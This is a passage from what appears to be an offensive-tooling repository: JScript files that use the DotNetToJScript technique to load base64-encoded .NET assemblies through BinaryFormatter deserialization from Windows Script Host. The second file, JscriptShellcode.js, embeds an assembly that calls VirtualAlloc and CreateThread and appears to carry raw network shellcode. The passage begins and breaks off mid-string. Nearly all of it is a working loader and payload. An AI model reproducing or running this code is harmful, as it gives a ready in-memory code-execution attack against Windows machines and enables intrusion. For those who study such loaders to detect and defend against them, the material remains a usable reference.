"AAAALnRleHQAAAAcCAAAACAAAAAKAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAADAQAAABA"+ 46 | "AAAABgAAAAwAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAASAAAAAAAAAAAA"+ 47 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAPgnAAAAAAAASAAAAAIABQB0IAAAGAYAAAEAAAAAAAAA"+ 48 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAagIoDgAACnIB"+ 49 | 
"AABwcgEAAHAWHzAoDwAACiYqIgMoEAAACiYqQlNKQgEAAQAAAAAADAAAAHYyLjAuNTA3MjcAAAAA"+ 50 | "BQBsAAAABAIAACN+AABwAgAAgAIAACNTdHJpbmdzAAAAAPAEAAAMAAAAI1VTAPwEAAAQAAAAI0dV"+ 51 | "SUQAAAAMBQAADAEAACNCbG9iAAAAAAAAAAIAAAFHFQAACQAAAAD6ATMAFgAAAQAAABQAAAACAAAA"+ 52 | "AgAAAAEAAAAQAAAADgAAAAEAAAADAAAAAABkAQEAAAAAAAYA1ADYAQYAQQHYAQYAIQCmAQ8A+AEA"+ 53 | "AAYASQCOAQYAtwCOAQYAmACOAQYAKAGOAQYA9ACOAQYADQGOAQYAYACOAQYANQC5AQYAEwC5AQYA"+ 54 | "ewCOAQYAQwJ4AQoAYgIHAgoASgIHAgoAHAIHAgoAfwEHAg4AOwKmAQAAAAABAAAAAAABAAEAAQAQ"+ 55 | "AC4CAAA9AAEAAQBQIAAAAACGGKABBgABAGsgAAAAAIYAOAIQAAEAAAABAF8BCQCgAQEAEQCgAQYA"+ 56 | "GQCgAQoAKQCgARAAMQCgARAAOQCgARAAQQCgARAASQCgARAAUQCgARAAWQCgARAAYQCgARUAaQCg"+ 57 | "ARAAcQCgARAAeQCgAQYAgQBdAhoAoQBXAiUALgALADQALgATAD0ALgAbAFwALgAjAGUALgArAHoA"+ 58 | "LgAzAKQALgA7AKQALgBDAGUALgBLAKoALgBTAKQALgBbAKQALgBjAM8ALgBrAPkAQwBbAAYBBIAA"+ 59 | "AAEAAAAAAAAAAAAAAAAAbQIAAAIAAAAAAAAAAAAAACsACgAAAAAAAgAAAAAAAAAAAAAAKwAHAgAA"+ 60 | "AAACAAAAAAAAAAAAAAArAHgBAAAAAAAAADxNb2R1bGU+AG1zY29ybGliAEd1aWRBdHRyaWJ1dGUA"+ 61 | "RGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRy"+ 62 | "aWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJp"+ 63 | "YnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0"+ 64 | "dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0"+ 65 | "dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1"+ 66 | "dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAcGF0aABFeGFtcGxlQXNzZW1ibHkuZGxs"+ 67 | "AFN5c3RlbQBNZXNzYWdlQm94SWNvbgBTeXN0ZW0uUmVmbGVjdGlvbgAuY3RvcgBTeXN0ZW0uRGlh"+ 68 | "Z25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNv"+ 69 | "bXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAU3lzdGVtLldpbmRvd3MuRm9ybXMATWVzc2Fn"+ 70 | "ZUJveEJ1dHRvbnMAVGVzdENsYXNzAFJ1blByb2Nlc3MAT2JqZWN0AERpYWxvZ1Jlc3VsdABTdGFy"+ 71 | "dABTaG93AE1lc3NhZ2VCb3gARXhhbXBsZUFzc2VtYmx5AAAAAAAJVABlAHMAdAAAAFHJamWFAwlO"+ 72 | 
"rJGFIP1X2+UABCABAQgDIAABBSABARERBCABAQ4EIAEBAgoABBFFDg4RSRFNBQABElEOCLd6XFYZ"+ 73 | "NOCJCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABQBAA9F"+ 74 | "eGFtcGxlQXNzZW1ibHkAACkBACRFeGFtcGxlIEFzc2VtYmx5IGZvciBEb3ROZXRUb0pTY3JpcHQA"+ 75 | "AAUBAAAAACQBAB9Db3B5cmlnaHQgwqkgSmFtZXMgRm9yc2hhdyAyMDE3AAApAQAkNTY1OThmMWMt"+ 76 | "NmQ4OC00OTk0LWEzOTItYWYzMzdhYmU1Nzc3AAAMAQAHMS4wLjAuMAAABQEAAQAAAAAAAHmcdFoA"+ 77 | "AAAAAgAAABwBAACoJgAAqAgAAFJTRFNNa8cRFMTWSo4q3onbc/8oAQAAAEQ6XFNvdXJjZUNvZGVc"+ 78 | "RG90TmV0VG9KU2NyaXB0XEV4YW1wbGVBc3NlbWJseVxvYmpcUmVsZWFzZVxFeGFtcGxlQXNzZW1i"+ 79 | "bHkucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 80 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 81 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 82 | "AAAAAAAAAAAAAAAAAAAAAAAA7CcAAAAAAAAAAAAABigAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 83 | "APgnAAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAA"+ 84 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 85 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 86 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 87 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 88 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 89 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 90 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 91 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 92 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAA"+ 93 | "AAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAAsAMAAAAAAAAAAAAAsAM0AAAA"+ 94 | "VgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAA"+ 95 | 
"AD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8A"+ 96 | "AAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBBADAAABAFMAdAByAGkAbgBn"+ 97 | "AEYAaQBsAGUASQBuAGYAbwAAAOwCAAABADAAMAAwADAAMAA0AGIAMAAAAGIAJQABAEMAbwBtAG0A"+ 98 | "ZQBuAHQAcwAAAEUAeABhAG0AcABsAGUAIABBAHMAcwBlAG0AYgBsAHkAIABmAG8AcgAgAEQAbwB0"+ 99 | "AE4AZQB0AFQAbwBKAFMAYwByAGkAcAB0AAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUA"+ 100 | "AAAAAAAAAABIABAAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAARQB4AGEAbQBw"+ 101 | "AGwAZQBBAHMAcwBlAG0AYgBsAHkAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEA"+ 102 | "LgAwAC4AMAAuADAAAABIABQAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAeABhAG0AcABs"+ 103 | "AGUAQQBzAHMAZQBtAGIAbAB5AC4AZABsAGwAAABiAB8AAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkA"+ 104 | "ZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIABKAGEAbQBlAHMAIABGAG8AcgBzAGgAYQB3"+ 105 | "ACAAMgAwADEANwAAAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"+ 106 | "AABQABQAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAARQB4AGEAbQBwAGwAZQBB"+ 107 | "AHMAcwBlAG0AYgBsAHkALgBkAGwAbAAAAEAAEAABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAA"+ 108 | "RQB4AGEAbQBwAGwAZQBBAHMAcwBlAG0AYgBsAHkAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQBy"+ 109 | "AHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIA"+ 110 | "cwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 111 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 112 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 113 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 114 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 115 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 116 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 117 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 118 | 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 119 | "AAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAABg4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 120 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 121 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 122 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 123 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 124 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 125 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 126 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 127 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 128 | "AAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5SZWZs"+ 129 | "ZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA"; 130 | var entry_class = 'TestClass'; 131 | 132 | try { 133 | setversion(); 134 | var stm = base64ToStream(serialized_obj); 135 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); 136 | var al = new ActiveXObject('System.Collections.ArrayList'); 137 | var d = fmt.Deserialize_2(stm); 138 | al.Add(undefined); 139 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 140 | 141 | } catch (e) { 142 | debug(e.message); 143 | } -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/JScript/JscriptShellcode.js: -------------------------------------------------------------------------------- 1 | function setversion() { 2 | new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319'; 3 | } 4 | function debug(s) {} 5 | function base64ToStream(b) { 6 | var enc = new ActiveXObject("System.Text.ASCIIEncoding"); 7 | var length = 
enc.GetByteCount_2(b); 8 | var ba = enc.GetBytes_4(b); 9 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 10 | ba = transform.TransformFinalBlock(ba, 0, length); 11 | var ms = new ActiveXObject("System.IO.MemoryStream"); 12 | ms.Write(ba, 0, (length / 4) * 3); 13 | ms.Position = 0; 14 | return ms; 15 | } 16 | 17 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ 18 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ 19 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ 20 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ 21 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ 22 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ 23 | "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ 24 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ 25 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ 26 | "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ 27 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ 28 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ 29 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ 30 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ 31 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ 32 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ 33 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ 34 | "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ 35 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ 36 | 
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ 37 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ 38 | "ZW1ibHkGFwAAAARMb2FkCg8MAAAAABQAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ 39 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ 40 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMA7UK+7wAAAAAA"+ 41 | "AAAA4AAiIAsBMAAADAAAAAYAAAAAAAByKgAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAYA"+ 42 | "AAAAAAAAAIAAAAACAAAAAAAAAwBghQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAHyoA"+ 43 | "AE8AAAAAQAAAwAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAHApAAA4AAAAAAAAAAAAAAAAAAAA"+ 44 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ 45 | "AAAALnRleHQAAADwCwAAACAAAAAMAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAwAMAAABA"+ 46 | "AAAABAAAAA4AAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAASAAAAAAAAAAAA"+ 47 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFMqAAAAAAAASAAAAAIABQC8IAAAtAgAAAEAAAAAAAAA"+ 48 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzAGAF0AAAAB"+ 49 | "AAARAigQAAAKIHcBAACNEwAAASXQAQAABCgRAAAKJY5pCn4SAAAKIAAQAAAgADAAAB9AKAEAAAYL"+ 50 | "FgcGKBMAAAp+EgAAChYHfhIAAAoWfhIAAAooAgAABhUoAwAABiYqAAAAQlNKQgEAAQAAAAAADAAA"+ 51 | "AHY0LjAuMzAzMTkAAAAABQBsAAAA3AIAACN+AABIAwAAAAQAACNTdHJpbmdzAAAAAEgHAAAEAAAA"+ 52 | "I1VTAEwHAAAQAAAAI0dVSUQAAABcBwAAWAEAACNCbG9iAAAAAAAAAAIAAAFXlQI0CQIAAAD6ATMA"+ 53 | "FgAAAQAAABgAAAAEAAAAAQAAAAQAAAAMAAAAEwAAABAAAAABAAAAAQAAAAEAAAADAAAAAQAAAAEA"+ 54 | "AAABAAAAAQAAAAAAxAIBAAAAAAAGAPIBUQMGAF8CUQMGACYBEAMPAHEDAAAGAE4B4AIGANUB4AIG"+ 55 | "ALYB4AIGAEYC4AIGABIC4AIGACsC4AIGAGUB4AIGADoBMgMGABgBMgMGAJkB4AIGAIABlQIGANgD"+ 56 | "2QIGAP0AUQMGAOIA2QIGAH0C2QIGAKMDUQMGAPMD2QIGAMcA2QIGAAkD2QIGAK8CMgMAAAAAHwAA"+ 57 | "AAAAAQABAAEAEAC2AAAAQQABAAEAAAEAACgAAABBAAEABQATAQAAAQAAAEkAAgAFADMBRwA8AAAA"+ 58 | "AACAAJEgkQBAAAEAAAAAAIAAkSCpAEgABQAAAAAAgACRIMsDUgALAFAgAAAAAIYYAwMGAA0AAAAB"+ 59 | 
"ALIDAAACAI4CAAADAOwAAAAEAN8DAAABAIADAAACAIICAAADALwDAAAEAPcCAAAFAJMDAAAGAJ4A"+ 60 | "AAABANoAAAACACMDCQADAwEAEQADAwYAGQADAwoAKQADAxAAMQADAxAAOQADAxAAQQADAxAASQAD"+ 61 | "AxAAUQADAxAAWQADAxAAYQADAxUAaQADAxAAcQADAxAAeQADAxAAiQADAwYAgQADAwYAoQDpAx8A"+ 62 | "uQDyAicAwQD5AyoALgALAFgALgATAGEALgAbAIAALgAjAIkALgArAJ8ALgAzAJ8ALgA7AKUALgBD"+ 63 | "AIkALgBLAK0ALgBTAJ8ALgBbAJ8ALgBjAMcALgBrAPEALgBzAP4AQwBbAEwBYwB7AFIBAQB3AQAA"+ 64 | "BAAaALcCQQEDAJEAAQAAAQUAqQABAAABBwDLAwEAeCoAAAEABIAAAAEAAAAAAAAAAAAAAAAAtgAA"+ 65 | "AAQAAAAAAAAAAAAAADMAiAAAAAAABAADAAAAAF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9Mzc1"+ 66 | "ADxNb2R1bGU+ADxQcml2YXRlSW1wbGVtZW50YXRpb25EZXRhaWxzPgBBQTI5MkNGMEM3QTAwNzc4"+ 67 | "NTBBNjg3OURDNjg0RkUwQ0ZDOUM4MUMwNTUxRTkzQzcwNjAyN0VEQ0VFQkU3RUVCAG1zY29ybGli"+ 68 | "AFZpcnR1YWxBbGxvYwBscFRocmVhZElkAENyZWF0ZVRocmVhZABKc2NyaXB0U2hlbGxjb2RlAFJ1"+ 69 | "bnRpbWVGaWVsZEhhbmRsZQBoSGFuZGxlAFZhbHVlVHlwZQBmbEFsbG9jYXRpb25UeXBlAENvbXBp"+ 70 | "bGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBD"+ 71 | "b21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1h"+ 72 | "cmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25B"+ 73 | "dHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRp"+ 74 | "b25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1"+ 75 | "Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0"+ 76 | "cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAZHdTdGFja1NpemUAZHdT"+ 77 | "aXplAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcATWFyc2hhbABrZXJuZWwzMi5kbGwASnNjcmlw"+ 78 | "dFNoZWxsY29kZS5kbGwAU3lzdGVtAFN5c3RlbS5SZWZsZWN0aW9uAFplcm8AbHBQYXJhbWV0ZXIA"+ 79 | "LmN0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBkd01pbGxpc2Vjb25kcwBTeXN0ZW0uUnVu"+ 80 | "dGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1"+ 81 | "Z2dpbmdNb2RlcwBscFRocmVhZEF0dHJpYnV0ZXMAZHdDcmVhdGlvbkZsYWdzAFJ1bnRpbWVIZWxw"+ 82 | 
"ZXJzAGxwQWRkcmVzcwBscFN0YXJ0QWRkcmVzcwBXYWl0Rm9yU2luZ2xlT2JqZWN0AGZsUHJvdGVj"+ 83 | "dABJbml0aWFsaXplQXJyYXkAQ29weQAAAAAAAADKhgWBcD6KQL/0QDjhMME8AAQgAQEIAyAAAQUg"+ 84 | "AQEREQQgAQEOBCABAQIEBwIIGAcAAgESVRFZAgYYCAAEAR0FCBgICLd6XFYZNOCJAwYREAcABBgY"+ 85 | "CQkJCQAGGBgJGBgJGAUAAgkYCQgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93"+ 86 | "cwEIAQACAAAAAAAVAQAQSnNjcmlwdFNoZWxsY29kZQAABQEAAAAABwEAAkhQAAAZAQAUQ29weXJp"+ 87 | "Z2h0IMKpIEhQIDIwMjIAACkBACQwNzQwODUyNi1iMTRhLTQ3YjEtYjZjOS1iOWYyNWI3YWY0MGQA"+ 88 | "AAwBAAcxLjAuMC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjcuMgEAVA4URnJhbWV3"+ 89 | "b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC43LjIFAQABAAAEAQAAAAAAAAAAcGvEmwAA"+ 90 | "AAACAAAAdwAAAKgpAACoCwAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAFJTRFObik4n364f"+ 91 | "TIb1HFXS2D/uAQAAAEM6XFVzZXJzXGthcm5rXHNvdXJjZVxyZXBvc1xKc2NyaXB0U2hlbGxjb2Rl"+ 92 | "XEpzY3JpcHRTaGVsbGNvZGVcb2JqXFJlbGVhc2VcSnNjcmlwdFNoZWxsY29kZS5wZGIARyoAAAAA"+ 93 | "AAAAAAAAYSoAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFMqAAAAAAAAAAAAAAAAX0NvckRsbE1h"+ 94 | "aW4AbXNjb3JlZS5kbGwAAAAAAAD/JQAgABD86I8AAABgMdKJ5WSLUjCLUgyLUhSLcigPt0omMf8x"+ 95 | "wKw8YXwCLCDBzw0Bx0l171JXi1IQi0I8AdCLQHiFwHRMAdCLSBiLWCAB01CFyXQ8SYs0iwHWMf8x"+ 96 | "wKzBzw0BxzjgdfQDffg7fSR14FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gWF9aixLp"+ 97 | "gP///11oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmh/AAABaAIAAbuJ5lBQ"+ 98 | "UFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42"+ 99 | "izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1"+ 100 | "bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vgHSoKaKaVvZ3/1TwGfAqA++B1BbtHE3JvagBT"+ 101 | "/9UAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAA"+ 102 | "AQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAABkAwAAAAAAAAAAAABkAzQAAABW"+ 103 | "AFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAA"+ 104 | "PwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAA"+ 105 | 
